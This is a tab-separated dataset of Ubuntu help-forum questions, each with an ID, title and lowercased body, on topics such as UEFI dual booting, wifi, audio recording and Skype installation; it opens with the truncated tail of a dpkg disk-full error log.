write on buffer copy for backend dpkg-deb during `./boot/vmlinuz-3.2.0-54-generic ' : no space left on device no apport report written because the error message indicates a disk full error dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.2.0-54-generic /boot/vmlinuz-3.2.0-54-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.2.0-54-generic /boot/vmlinuz-3.2.0-54-generic processing triggers for man-db ... errors were encountered while processing : /var/cache/apt/archives/linux-image-3.2.0-54-generic_3.2.0-54.82_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) kernel info : patrick @ server01 : ~ $ dpkg -- list | grep `` linux-* '' ii libselinux1 2.1.0-4.1ubuntu1 selinux runtime shared libraries ii linux-firmware 1.79.6 firmware for linux kernel drivers ii linux-headers-3.2.0-53 3.2.0-53.81 header files related to linux kernel version 3.2.0 ii linux-headers-3.2.0-53-generic 3.2.0-53.81 linux kernel headers for version 3.2.0 on 64 bit x86 smp ii linux-headers-3.2.0-54 3.2.0-54.82 header files related to linux kernel version 3.2.0 ii linux-headers-3.2.0-54-generic 3.2.0-54.82 linux kernel headers for version 3.2.0 on 64 bit x86 smp ii linux-headers-server 3.2.0.54.64 linux kernel headers on server equipment . ii linux-image-3.2.0-23-generic 3.2.0-23.36 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.2.0-29-generic 3.2.0-29.46 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.2.0-32-generic 3.2.0-32.51 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.2.0-33-generic 3.2.0-33.52 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.2.0-34-generic 3.2.0-34.53 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.2.0-38-generic 3.2.0-38.61 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.2.0-39-generic 3.2.0-39.62 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.2.0-40-generic 3.2.0-40.64 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.2.0-41-generic 3.2.0-41.66 linux kernel image for version 3.2.0 on 64 bit x86 smp if linux-image-3.2.0-43-generic 3.2.0-43.68 linux kernel image for version 3.2.0 on 64 bit x86 smp if linux-image-3.2.0-44-generic 3.2.0-44.69 linux kernel image for version 3.2.0 on 64 bit x86 smp iu linux-image-server 3.2.0.43.51 linux kernel image on server equipment . iu linux-libc-dev 3.2.0-54.82 linux kernel headers for development iu linux-server 3.2.0.43.51 complete linux kernel on server equipment . ii util-linux 2.20.1-1ubuntu3 miscellaneous system utilities thanks you all so much for any help ! i 'm a high school senior learning as i go : )
355636	what is the best way to dual boot with uefi	i 've seen many versions of this question , but none in my settings . here 's my situation : i have a msi z87-gd65 mobo ( ie uefi ) i have 1 ssd ( nothing installed ) i want to install windows ( 8 ) and ubuntu ( 13.04 ) on 2 separate partitions i want to avoid legacy mode ( use uefi ) if possible is there a way i can do that ? what 's should i install in what order to get it done in the cleanest way ? i do n't need to ( nor have anything ) to keep , and am i 'm decently competent to perform the installation , just need a pointer on the best way . thanks !
355638	hotkey for `` kde button '' menu ? and default shortcut-keys cheatsheets ?	what 's the hotkey to open that thing in kde that 's basically like the windows ' `` start '' menu ? i 've found it surprisingly hard to find some basic hotkey cheatsheets for my shiny new install of kubuntu ... anybody know of any ?
355639	screen brightness for hp probook 4540s doesnt work ?	i have applied $ gksu gedit /etc/default/grub code : if you change this file , run update-grub afterwards to update /boot/grub/grub.cfg . for full documentation of the options in this file , see : info -f grub -n 'simple configuration'` grub_default=0 grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=10 grub_distributor= lsb_release -i -s 2 > /dev/null || echo debian grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' acpi_backlight=vendor '' save and close gedit , next : sudo update-grub sudo reboot and nothing changed i have installed ubuntu 13.04 amd 64 help !
355641	ubuntu installation on external hard disk drive	my internal harddisk in my laptop got corrupted so i have removed . i loaded desktop ubuntu for testing from pendrive . now i want to install to my external hard disk . it already has 650gb of data in ntfs format . remaining space i splitted to ext4 and installed . when restarting , am not getting ubuntu loaded from hdd . please explain how to make my ubuntu load from external hard disk .
355642	unity date applet crashes all the time ( ubuntu 13.04 )	the default date applet which comes in unity crashes all the time . when i click on it , nothing will appear ( some tiny black window will appear ) . i restarted my system couple of times , still it didnt work . how to fix it ? i am using ubuntu 13.04 thanks
355645	touchpad not working of hp pav 2000	i am using hp pavillion 2000 series . since a week i face a problem that my touchpad gets disabled automatically but the led indicator doesnot get lit either . i have tried tapping on the upper-left corner dump but its of no use . i need to get my computer restarted every time . is there any method to get the disabling option totally blocked or any other method to make my system work properly ?
355647	how can one go about integrating messaging into an ubuntu touch app ?	hi i am wondering what is the best way to integrate a `` sharing '' feature into an app built for ubuntu touch ( as well as the desktop ) . i am wondering if there is some sort of documentation available ( searching did n't turn up anything for me ) . i want to be able to tap ( or click ) on an area of text and share it through a choice of any available messaging options . for phone , i 'd like to support text messaging , e-mail , social media , and any other options . for desktop i 'd like to support everything in the messaging menu ( whatever the user has installed that correlates ) . is there a standard `` sharing '' component ? is there a way to dynamically support all messaging across all devices , with all new messaging services that are installed to be present in a popover menu ? it would also be nice to support sharing of images ( for my program it would be maps , or charts ) in the exact same way .
355649	i am trying to install ubuntu but all i get is a `` no signal '' message on my monitor	i 'm trying to install ubuntu ( i 've tried 12.04 server , desktop and 13.04 desktop ) . i burn the image file to dvd , but on booting , all i get is the screen with the man in the circle and the keyboard , the dvd drive light flickers for a bit then i get the `` no signal '' message . my system is : amd a8-3850 , 8gb ram , asrock a75m mobo , kingston 60gb ssd and lg hd dvd/bluray combo . if it matters , i am using hdmi out . monitor is a viewsonic 13 '' .
355652	problems plotting with scilab	i have a hp 450 , and have installed scilab 5.4.1 . the problem is that it does n't plot anything i want to plot . i 've tried the simplest funtions i can have tried , and what i get is an empty window . i have tried those functions in other computers and it worked . how can i fix it ?
355654	wifi is fine on ubuntu but very slow on window 7	this is the first time i come here , so sorry if i make some mistakes . my question is : when my computer ( ubuntu 13.04 ) connect to wifi router , other computer ( install window 7 ) will have slow connection but my computer is fine . i try to config ( router ) to 11b 11g ... but nothing change . thank for your help ! edit : the result when i execute command sudo lspci : 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation xeon e3-1200/2nd generation core processor family pci express root port ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 00:16.0 communication controller : intel corporation 6 series/c200 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 ( rev 05 ) 00:1b.0 audio device : intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 05 ) 00:1c.0 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 1 ( rev b5 ) 00:1c.2 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 3 ( rev b5 ) 00:1c.4 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 5 ( rev b5 ) 00:1c.5 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 6 ( rev b5 ) 00:1d.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 ( rev 05 ) 00:1f.0 isa bridge : intel corporation hm67 express chipset family lpc controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 6 series/c200 series chipset family 6 port sata ahci controller ( rev 05 ) 00:1f.3 smbus : intel corporation 6 series/c200 series chipset family smbus controller ( rev 05 ) 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati whistler [ radeon hd 6600m/6700m/7600m series ] 02:00.0 network controller : broadcom corporation bcm4313 802.11b/g/n wireless lan controller ( rev 01 ) 03:00.0 usb controller : nec corporation upd720200 usb 3.0 host controller ( rev 04 ) 04:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168 pci express gigabit ethernet controller ( rev 06 )
355660	microphone works , but line in not	i have an interesting issue with ubuntu . i have a laptop that has one jack for line in/microphone and line out/headphones . this the reason why i bought a spliter like below : splits one 4 pines jack into two jacks : micrphone and line out i have an external studio microphone and headphones with the micrphone . case 1 ( working ) if i connect the micrphone of headphones to spliter that is inserted into my laptop , i can record my micrphone . headphones mic -- -- + | + -- -- -- - laptop | headphones output -+ case 2 ( not working ) if i connect another an external hardware ( for example a piano ) to the splitter , i can not record anything ... this is the issue . how can ubuntu recognize if there is a headphones micrphone or an external hardware that is not a headphones micrphone ? piano -- -- -- -- -- -- + | + -- -- -- - laptop | headphones output -+ ... and the question is how to fix this ? i want to record my piano using my laptop : through line in . would be the splitter an cause ? do i really need a hardware that i do n't have ( like an usb recorder ) ? update : tested on windows 8 on same laptop . it works properly ... ( un ) fortunately , i am an ubuntu user , so i will not go back to the windows world ... still searching for a solution on ubuntu . my laptop model is samsung np300e5v-s01ro . update 2 : using alsamixer i managed to listen only the piano sounds , without other microphone sounds . this is how the current alsamixer configuration looks : the information about my settings can be found here . i still can not select in audacity ( or other recording software ) the recording device . it records from the internal microphone . update 3 : pactl list sources outputs this in the ports section : case 1 piano is connected : analog-input-microphone-internal : internal microphone ( priority : 8900 ) analog-input-microphone : microphone ( priority : 8700 , not available ) case 2 an external microphone is connected : analog-input-microphone-internal : internal microphone ( priority : 8900 , not available ) analog-input-microphone : microphone ( priority : 8700 , available )
355661	ubuntu 13.10 update problem . no menu , ca n't launch terminal , no results in dash	performed update today . it wanted to restart , so i let it . looked at it later on and it is missing the menu bar . could move the mouse around , but the launcher is permanently visible ( i have it set to autohide ) . ctrl-alt-del does not bring up shutdown/restart buttons . ctrl-alt-t does not bring up terminal . have to shut down using power button . able to boot in recovery mode , but menu bar is still missing . can get into terminal using root shell from grub boot menu . not sure what to do here . is there a way to roll back today 's updates ?
355664	nano cursor appearance	i 'm using nano on a raspberry pi . the cursor was a green box before and i 've somehow changed it to a blinking line . how do i change it back to a green box ?
355666	amarok / clementine alternative	is there a music player or a functionality in amarok or clementine that allows to update the id3 tag of the files in my library that stores the changes in the library database only , leaving the original file intact ? i know it 's a weird question but i have in my collection some sfv hashed folders and i would like to leave the files there intact while being able to alter the tags appearing in the music player 's library . another reason is that some folders are in the local network and write access is disabled .
355667	what 's wrong with my svn+ssh settings ?	i created a project on sourceforge . when i try to checkout , i get the following error : $ svn checkout -- username=hopungo svn+ssh : //hopungo @ svn.code.sf.net/p/slkrepair/code-0/ slkrepair-code-0 ssh : connect to host svn.code.sf.net port 22 : connection timed out svn : e210002 : unable to connect to a repository at url 'svn+ssh : //hopungo @ svn.code.sf.net/p/slkrepair/code-0' svn : e210002 : to better debug ssh connection problems , remove the -q option from 'ssh ' in the [ tunnels ] section of your subversion configuration file . svn : e210002 : network connection closed unexpectedly i used suggestion from how to use svn list svn+ssh : //user @ host/home/svn/myrepo without svn_ssh path. , but got such output : warning : identity file /home/karimov-danil/.ssh/id_rsa not accessible : no such file or directory . my ~/.subversion/config [ targets ] section is : ssh = ssh -l hopungo -i /home/karimov-danil/.ssh/id_rsa and my /etc/environment has such lines : http_proxy= '' http : //cache.mrk:8080/ '' https_proxy= '' https : //cache.mrk:8080/ '' ftp_proxy= '' ftp : //cache.mrk:8080/ '' socks_proxy= '' socks : //socks.mrk:1080/ '' where did i mistake ? what options should i configure ?
355668	how to install ack-grep 2.0 with apt-get ?	currently i 'm using ack-grep 1.92 . now i want to use ack-grep 2.+ . official documentation says that i can install ack-grep 2.0 with apt-get , but when i try to install , it says it 's already the newest version . i also tried install it with a specified version like : sudo apt-get install ack-grep 2.10 it installs something , but ack-grep is still 1.92 . how can i install the newest version ?
355671	how to change icon size ?	i 'm running ubuntu 12.04 32bit on a dell netbook , and the icons are way too huge . i 've tried clicking on the cog and logging in as `` ubuntu '' instead of `` ubuntu 2d '' but that does n't work . what do i do ?
355678	uninstall 12.10	i am newbie . i upgraded from 12.04 to 12.10 using `` sudo do-release-upgrade -d '' . now , i am not able to get the system to boot up . is there a way of reversing this and re-installing 12.04 ? kindly help .
355681	how do i manually add a password to the keyring ?	my dad uses facebook all the time on my pc . the password keyring will remember only my accounts and not his ( facebook account ) , it wo n't even ask to remember his password . i want the ubuntu 13.04 password keyring to remember his passwords instead of just mine . i do n't understand why it remembers mine , but not his .
355683	wwan ( gobi2000 ) / thinkpad / xubuntu 13.10 not working	i did copy the firmware , installed the gobi-loader as thinkwiki suggests . lsusb shows bus 00 device 005 : id 05c6:9205 qualcomm , inc . the 9205 indicates that the firmware is loaded correctly . i can switch wwan on/off via the fn-key . sim is insterted correctly , i tried with and without pin disabled . the apn for o2 germany is correct . networkmanager still shows `` mobile boradband '' : disabled and it does not connect , if i click the connection i set up in network manager . any suggestions , what i could try ?
355687	retrieving status code when using pipelines	i run the following command in a bash script : cd somedir & & ( sh -c `` $ cmd_str '' ) 2 > & 1 | some_filtering | sed -u -e ... . i.e . i run cmd_str in somedir ( actually cmd_str is 'make ' or 'make target ' ) , do some filtering on cmd_str 's output and then replace some symbols by 'sed ' . i need to retrieve cmd_str 's status code in case cmd_str fails to return it from my script . how can i do it ?
355688	thunderbird wo n't send email	out of sudden , my thunderbird stopped sending e-mails . when i click the send button , nothing happens . the send button does absolutely nothing . no error messages whatsoever . it 's like it does n't even try to do anything . restarting thunderbird did n't help . it can receive , though . i 'm running ubuntu 12.04 .
355691	64 bit - ubuntu 13.04 skype 4.2 can not install	i 've been trying to download and install skype 4.2 on my pc for a long time , i have attempted many times but i have failed . the description of my computer is the following : dual booting with windows 8 ( 32 bit ) installed ubuntu 13.04 ( 64-bit ) with wubi installed skype app and desktop application for windows i have installed all updates and ubuntu seems to run smoothly and sexy ( as usual ) . i have tried to install it from the skype website ( http : //www.skype.com/en/download-skype/skype-for-computer/ ) , not knowing which distribution to choose , i chose the `` ubuntu 12.04 ( multiarch ) '' distribution . after downloading i get the `` skype-ubuntu-lucid_4.2.0.11-1_i386.deb '' package on my downloads folder . after double-clicking it i get the following message from the ubuntu software center : `` wrong architecture 'i386 ' '' withtout further explanation . then i try the `` ubuntu 10.04 ( 32-bit ) '' distribution ... same results . then i try the `` dynamic '' distribution ... get a `` skype-4.2.0.11.tar.bz2 '' and i get the following read me file : skype for linux 4.2 readme installation if you are using one of the distribution-specific packages , simply run the `` skype '' executable . kde users should find a launcher for skype in their internet menu if skype has been installed through one of these packages . if you are using the dynamic and statically linked generic versions , you will need to choose a path for skype to exist in . we recommend copying the skype binary to /usr/bin and installing sounds/ , lang/ and avatars/ into the /usr/share/skype directory . since i do n't have a lot of experience with linux , i have n't accepted tux as my lord and saviour , neither i have been bourne again ( get it ? bourne again ? anyone ? no ? okay . ) , i just know the basic commands . even though i know them , i could n't successfully , do what the readme file instructed me to do . i tried 'cp ' and 'mv ' but i miserably failed to do so . $ cp skype-4.2.0.11.tar.bz2 /usr/bin i do n't think i am doing it correctly because i get the following output : cp : can not stat âskype-4.2.0.11.tar.bz2â : no such file or directory i assumed that that was n't actually the binary file so i just tried inputting the following : $ cp skype /usr/bin the file that was in the tar.bz2 with no other description or extension just `` skype '' . and it failed i am assuming you think i am either a troll , an ignoramus , or just had a sucky teacher ... what am i doing wrong ? do i specify where the file is ? how do you install the dynamic distribution ? anyway , i tried googling it and i found the following : how to install skype with 13.04 i literally tried every single thing , every input and every suggestion . nothing worked , most inputs gave me the following output : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : skype : depends : skype-bin but it is not installable e : unable to correct problems , you have held broken packages . : ( i tried the following suggested from : http : //www.dedoimedo.com/computers/ubuntu-ringtail-skype.html chalgafe @ ubuntu : ~ $ sudo dpkg -i -- force-architecture skype-ubuntu- this was the input : lucid_4.2.0.11-1_i386.deb dpkg : error processing skype-ubuntu-lucid_4.2.0.11-1_i386.deb ( -- install ) : can not access archive : no such file or directory errors were encountered while processing : skype-ubuntu-lucid_4.2.0.11-1_i386.deb i believe that 's what he meant with the asterisk right ? to put our corresponding distributions ? anyway , it did n't work . what am i doing incorrectly ? what can i do ? other unnecessary details ( please , do n't let this affect your answer by straying away from the problem ) skype is the only reason i am still using windows 8 on other forums , people that had windows 8 and skype app for it , could n't install it either . is there a correlation ? there s no other way of accessing skype unfortunately .
355692	purge all ppas with a single command	how can i purge all added ppa with a single command in terminal ?
355693	how can i enable autoscrolling for other applications in ubuntu ?	firefox and chrome have a feature that when you click your middle button and move your mouse up or down from the initial position it will scroll , rather than having to spin the scroll wheel madly . is there anything out there that can do this in other / all programs in ubuntu , such as libre writer , terminal , gimp , etc ... ? running 13.04 with logitech m510 mouse .
355696	ubuntu 10.04 installation	i want to install ubuntu 10.04 , i have downloaded its iso file , but wubi installer is missing from it , how can i install ubuntu ? or can i use wubi of 12.04 for installation ?
355698	unable to change permisions on windows partition disk	i need to change permissions of files in my /media/maven/projects maven is my windows disk partition . the permissions on the projects folder are : : /media/maven/projects $ ls -la \total 340 drwxrwxrwx 1 root root 12288 oct 6 21:31 . drwxrwxrwx 1 root root 32768 oct 9 06:32 .. all the projects are set to drwxrwxrwx i need to change them to 755 so i tried : ~ $ sudo chmod 755 -r /media/maven/projects but i get errors : ... read-only file system the result of ls -la /media/maven/projects remains the same . help me resolve this .
355703	is it possible to install nvidia + ati ( amd ) graphics drivers on same pendrive system ?	i installed ubuntu 13.04 on a pendrive . now i want to install graphics drivers . the problem is i 'm launching this system on a few pcs . one is a laptop with radeon , and others pcs got nvidia cards . is is possible to install both graphics drivers on same pendrive system ? $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 13.04 release : 13.04 codename : raring $ lspci | grep vga 01:05.0 vga compatible controller : advanced micro devices [ amd ] nee ati rc410m [ mobility radeon xpress 200m ]
355707	unable to open file in r modefatal	through terminal , i am trying to execute a program . i have to mention a file which is present in another folder while writing the execute command . i have one folder in which my executable resides . that folder name is apps . and the file which i want to mention along with the execute command is residing in another folder named `` dataset '' . this folder is in apps folder . rightnow , i am in apps folder and run this command ./executable -i ./dataset/filename but this gives me this error though the file is present in dataset folder : unable to open file in r mode fatal
355711	update apache 2.2.22 to 2.2.25	i need to update apache to version 2.2.25 on ubuntu 13.04 i have tried installing the update from apt-get but the package is showing as 2.2.22 can anyone help ?
355712	how write makefile for zeromq application	sudo make has error make all-am make [ 1 ] : entering directory `/home/martin/downloads/livefeedserver' make [ 1 ] : *** no rule to make target `liblzmq.o ' , needed by `liblzmq.a ' . stop . make [ 1 ] : leaving directory `/home/martin/downloads/livefeedserver' make : *** [ all ] error 2 makefile.am aclocal_amflags = -i m4 noinst_libraries = liblzmq.a bin_programs = server server_sources = server.c zhelpers.h configure.ac ac_init ( [ package ] , [ version ] ) am_init_automake ( [ foreign subdir-objects ] ) ac_config_srcdir ( [ configure.ac ] ) ac_config_headers ( [ config.h ] ) # not even really needed ac_prog_cc # or ac_prog_cxx ac_prog_ranlib ac_config_files ( [ makefile ] ) ac_output
355713	is monitor damage possible if a custom resolution is set through xrandr	upon using ubuntu 12.04 i detected that the native resolution of my monitor i.e . ( 1280x1024 ) is not detected as one of the available resolutions by default . hence i ran the command cvt 1280 1024 60 and used to output to add a new mode through xrandr . some forums have reported monitor damage due to setting such a custom resolution . will setting a resolution which my monitor supports through xrandr possibly cause any damage to the monitor ?
355715	mount multiple nfs server drives mount to single nfs client drive	i 've setup the nfs server on three machines each has 2 tb data storage size . so i 've collectively 8 tb space on these three serves . now i 've a situation that i 've file of 8tb at ntfs client machine . i want to mount it transparently to these server . sudo mount serverip : /folder/already/setup/to/be/shared/home/username/folder/in/your/local can someone please tell me some mechanism that we can mount same directory of nfs client to multiple nfs servers . so that i can store the file 8tb in size .
355718	text cursor color should change according to language	ok , there is a language indicator/selector at top of unity ( i am on ubuntu 12.04 ) . and i was thinking that text cursor color could be a nice way of current language indication . i 'm using three languages , and while typing in gmail or somewhere , we look at the text cursor . so for convenience reasons it would be a nice way to adapt separate color ( or text cursor form ) for each language . i do n't know if this is already implemented . would be nice to use this feature . would appreciate if you can point me in right direction . as i said , this is not about mouse cursor/pointer , this is about the cursor in text fields .
355719	arecord generating blank files	i am trying to record something using the utility arecord but i am unable to do so . the command generates an audio file but when i play it , it is blank . the operating system information : linux network 3.2.0-54-generic # 82-ubuntu smp tue sep 10 20:08:42 utc 2013 x86_64 x86_64 x86_64 gnu/linux distributor id : ubuntu description : ubuntu 12.04.3 lts release : 12.04 codename : precise the output of arecord -l : **** list of capture hardware devices **** card 0 : intel [ hda intel ] , device 0 : alc662 rev1 analog [ alc662 rev1 analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : intel [ hda intel ] , device 2 : alc662 rev1 analog [ alc662 rev1 analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 the screenshot of alsamixer i am linking : i am on this since yesterday and have not found any solution . can my sound card be faulty ? i am able to listen to other music files though . the command i am executing is arecord -d10 test.wav .
355723	problems when installing ubuntu alongside windows	i 've just bought a new acer computer and have been trying to install ubuntu it . i 've been following the steps as i did on my other computer and get this error when selection the option : `` something else '' . i 've selected the partition and clicked continue and got this error : what does this message mean and if i keep going what would happen to my computer . any help would be awesome .
355724	migration to linux . files readability . file systems	my idea is the following : i want to migrate from win7 to linux , specifically ubuntu . as i know the file systems of the two os are different - ntfs and the linux one i do n't know ... i want to put my files from my current hdd to another , then to install the ubuntu and finally to get the files back . will it be possible the files ( which come from the old file system ) to be read by the new file system ? also , what kind of obstacles i should have in mind when trying to do that ? i am more than beginner in the linux world so every additional advice will be highly appreciated ! i have never used linux but i believe it is the proper way of using a computer ! i will keep my words about microsoft ... . : x thank you , people ! ! !
355725	how to create a datagrid in gtk without gtk sharp ?	i would like to write a gtk program with a datagrid . however gtk sharp is for the .net framework . is there any non-.net library or framework with a datagrid that i can use ?
355727	how to install ubuntu server with uefi and raid1 + lvm	i used to install my servers with lvm over software raid1 , and grub install on the mbr of both drives . now i have an uefi server , and the compatibility ( bios ) mode does not seem to work . so i went the way of installing with uefi . first test , single drive installation works fine . then i tried to install with raid1 + lvm . i partionned my two drives the same way : an efi system partition , 200mb a physical raid partition then i did setup : - a raid 1 using both disks raid partitions - a lvm volume group on the raid 1 array - three logical volumes : / , /home and swap the installation went on , but on reboot , i get a grub shell and i am stuck . so , is it possible to have grub2-efi work on lvm over raid1 ? what is the way to achieve this ? are there other bootloader alternatives ( direct linux loading from efi ? ? ) ? etc ...
355728	how to run ubuntu touch apps on ubuntu desktop ?	i see there are some nice apps being developed for ubuntu touch and that some of them support larger screens . now , i would like to run some of these apps on my desktop ? is this possible at the moment ? if so , how could it be done ? i see that one can install the core apps , but i have n't found any instruction on installing click packages .
355729	ca n't add any ppa 's	every time i try to add a ppa i get this error message . i have tried with about a dozen ppa's edit : ubuntustudio 12.04
355731	use integrated intel graphic card for display and tesla for cuda	i have a tesla c2050 and an integrated graphic card intel xeon e3 1200 . what i want to do is to use the intel card for the screen and the tesla card for doing cuda calculations . i have installed cuda and the nvidia drivers , and when i run the test programs in the sdk , it works perfectly for the programs devicequery and bandwidthtest , which does not use any opengl , the result only comes on the terminal . so it is possible to use the tesla for cuda only . however , when i try to run the programs under the folder 5_simulations , such as particles , then i get the following error : xlib : extension `` glx '' missing on display `` :0.0 '' . freeglut ( ./particles ) : opengl glx extension not supported by display ':0.0' i do n't really know what this error means , is it a driver problem or something else ? i have already tried install mesa-utils . regards erik
355732	unknown keycode	i have some keys on my msi gt70 notebook that got triggerd in /dev/input/event3 , but when i look in showkey it does not appear to have an keycode when i press the key ( s ) . how can i attach an command to this key ( s ) ? before ubuntu i run windows , where msi had a utility for these keys . extra information : when i open the keyboard application and add an custom shortcut , it does not reconize the key itself . only in combination with another key . then the key is called â¨mod2â¨ . but when i save this , and press the key combination it does not appear to run the selected command/application . thanks .
355733	upgrade to 11.4 or better	i have been operating on a 10. ? and want to upgrade to a newer release . i tried upgrading through the update manager to 11.4 and got this response > failed to fetch ... . this is the crucial part > what is the best way to upgrade and do i need to back-up everything ( files ) and will i need to reinstall programs ? i am totally new to this system . i like it but it is a bit confusing . please help ! if you have answers , please be as clear and detailed as possible/ many thanks !
355735	lock-up recovery procedure after the screen lock timeout	what is the procedure for resolving ubuntu lock-ups ? after the timeout and associated screen lock , wake-up activity such as mouse movement or key presses -- i usually use the harmless shift key -- fail to bring up the os login prompt . sometimes the desktop wallpaper will be displayed ; sometimes the screen will be black . in either case , the cursor is visible and movable but hovering it on the left to get a launcher bar will not result in a launcher bar being displayed and hovering it in the upper right corner will not result in a drop down menu being displayed . this has been observed on 12.04 with updates to early october 2013 . hardware : samsung rf711 s04hk with nvidia optimus 540m .
355736	multiple problems while installing ubuntu 13.04 on lenovo g500 laptop	dear community , i encountered several problems when installing ubuntu on my new lenovo g500 laptop . first i bumped in the problem ( also reported by many other ) of the black screen after booting ubuntu . this problem i recould solve by changing the `` quiet splash '' record of grub to `` nomodeset '' . ubuntu install was successful then . after the installation , i had a black screen again when booting up for the first time . i booted up again with `` nomodeset '' , and enabled the external amd driver at hardware drivers . booting still do not worked ( only with nomodeset ) , and when i log in , the system gives me a `` system program problem detected '' message , and the system ( desktop ) does not load in . please , can you advise me what to do ? shall i re-install ubuntu ? what are the steps to make my ubuntu work with this harver ? hardware : lenovo g500 with intelcore i5-3230m 3,2ghz processor and amd radeon hd8570 integrated chip thank you for your help in advance !
355739	running `` crusader kings ii ''	i am trying to run `` crusader kings ii '' using wine , and a lot of workarounds suggest using winedebug command , but whenever i use it in terminal , it shows a message that command not found . does anyone know how to solve this ?
355742	no wireless in dell inspiron 1521 with 12.04	i recently bought a dell inspiron 15 3521 with windows 8 pre-installed , and installed ubuntu 12.04 on it . the wireless is not working on it . i have tried a lot of methods available at the forums , but none seem to work . i first tried by installing the broadcom sta wireless driver . when that did n't work , i followed some steps given on a forum to remove it and install b43 firmware instead . that did n't help either . here are the relevant terminal outputs sudo lshw -c network *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:01:00.0 logical name : eth0 version : 05 serial : 74:86:7a:20:2d:48 size : 10mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl_nic/rtl8105e-1.fw ip=10.201.136.155 latency=0 link=yes multicast=yes port=mii speed=10mbit/s resources : irq:42 ioport:2000 ( size=256 ) memory : c0404000-c0404fff memory : c0400000-c0403fff *-network unclaimed description : network controller product : qca9565 / ar9565 wireless network adapter vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:02:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : c0500000-c057ffff memory : afb00000-afb0ffff and the output for lspci -nn | grep 0280 02:00.0 network controller [ 0280 ] : atheros communications inc. device [ 168c:0036 ] ( rev 01 ) i have tried doing sudo modprobe ath9k and sudo modprobe b43 without success .
355743	about samba sharing in 12.4 ubuntu server	i have created a folder in samba sharing in that i have created spread sheet an i gave full permission to that folder and file in command line my users are in workgroup they can not access that file at the same time if one had had open that file to edit in the sense another user can only able to read that file can not edit that file it shows as `` you can only read because another user is using '' how to solve this problem ? users have to access that file at one time from samba sharing
355746	downloaded a file without wget using browser can this be resumed it is broken download	i downloaded following file http : //sourceforge.net/projects/opsi/postdownload ? source=dlp file is 920 mb approximately , i do not use any download manager it was a direct http download , after having approximately 600 mb of download some how the download has broken , i have a file now opsi4.0.3-2-servervm.zip which is 600 mb but this should have been 900 mb is there any way to resume this one using wget , i am on 12.04
355747	will url entry in .desktop files work from unity launcher ?	this is a small .desktop file i made to open a directory using default file manager . but this is n't working , but substituting exec in place of url works . exec=pcmanfm /medi/user/container i was wondering if this was specific for unity launcher since it works from file managers like dolphin and thunar . note : i 'm talking about the action entry and not the main exec , which works fine .
355750	where is application/others in ubuntu 13.04 ?	first , im new in ubuntu so please bear with me . i 've installed xampp for linux ( lampp ) , and now im trying to get its ui ( like windows ) by following this guide i 've successfully followed the guide , until the final step that i must open the xampp in application > > > others . where is this application/others folder ? i tried to find it and do some googling but i still cant find it . thanks for your time : d
355752	installing 12.04 on acer travelmate x483	installation stopped and this is what is showing on the screen : udevd [ 261 ] : '/sbin/blkid -o udev -p /dev/sdb ' [ 3102 ] terminated by signal 9 ( killed ) what should i do next ? all of your help is greatly appreciated , thank you in advanced ! !
355753	ubuntu server apf-firewall configuration	i have not used the apf-firewall before and i 'm having trouble configuring it . i have already try setting the iptables but it fails to start , so what more do i need to do ? thank you
355754	skype animation not working on my ubuntu machine	on my system 's skype animation is not working on its symbolys . please help how to enable animation on skype
355762	unity launcher `` stuck '' icons	i 'm trying to make my ubuntu clean and tidy , and there is a few launchers on the unity-bar i would love to get rid of . for example , i love the feature with the desktop-switcher . but , i am only using my keyboard for that function , and the icon on the unity-bar is annoying me ( since i am never using it ) . i ca n't just put it in the trash , it 's stuck on the bar . i 've tried to go to the appearance settings , and ticked away the checkbox for the desktop-switcher . the thing is , it disables the whole feature , and that 's annoying . another example ; mounted hard-drives and usb-pens ? why do they have to appear on the bar as well as other things ? and the `` show desktop '' icon ? those icons are taking too much space on the bar , and i want them gone , if you have any smart ideas on how i could customize unity for my purposes , i would love to hear from you . thanks !
